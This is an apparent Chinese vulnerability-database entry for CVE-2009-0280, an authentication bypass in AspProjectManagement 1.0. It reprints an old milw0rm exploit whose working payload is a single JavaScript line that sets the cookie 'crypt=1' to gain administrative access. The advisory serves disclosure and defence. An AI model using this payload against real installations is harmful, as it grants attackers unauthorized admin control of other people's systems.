ASP Project Management Cookie 身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117277 漏洞类型 授权问题
发布时间 2009-01-22 更新时间 2009-01-27
CVE编号 CVE-2009-0280 CNNVD-ID CNNVD-200901-356
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7850
https://cxsecurity.com/issue/WLB-2009010059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-356
|漏洞详情
AspProjectManagement1.0版本允许远程攻击者通过把cryptcookie设置成1,绕过身份认证和获得管理访问权限。
|漏洞EXP
#####################################################################################
####                        Asp-project Cookie Handling                          ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.sourceforge.net/projects/asp-project                         #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#javascript:document.cookie = "crypt=1; path=/";                                    #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-01-22]
|参考资料

来源:XF
名称:aspproject-cookie-security-bypass(48172)
链接:http://xforce.iss.net/xforce/xfdb/48172
来源:BID
名称:33401
链接:http://www.securityfocus.com/bid/33401
来源:BUGTRAQ
名称:20090122Asp-projectCookieHandling
链接:http://www.securityfocus.com/archive/1/archive/1/500292/100/0/threaded
来源:MILW0RM
名称:7850
链接:http://www.milw0rm.com/exploits/7850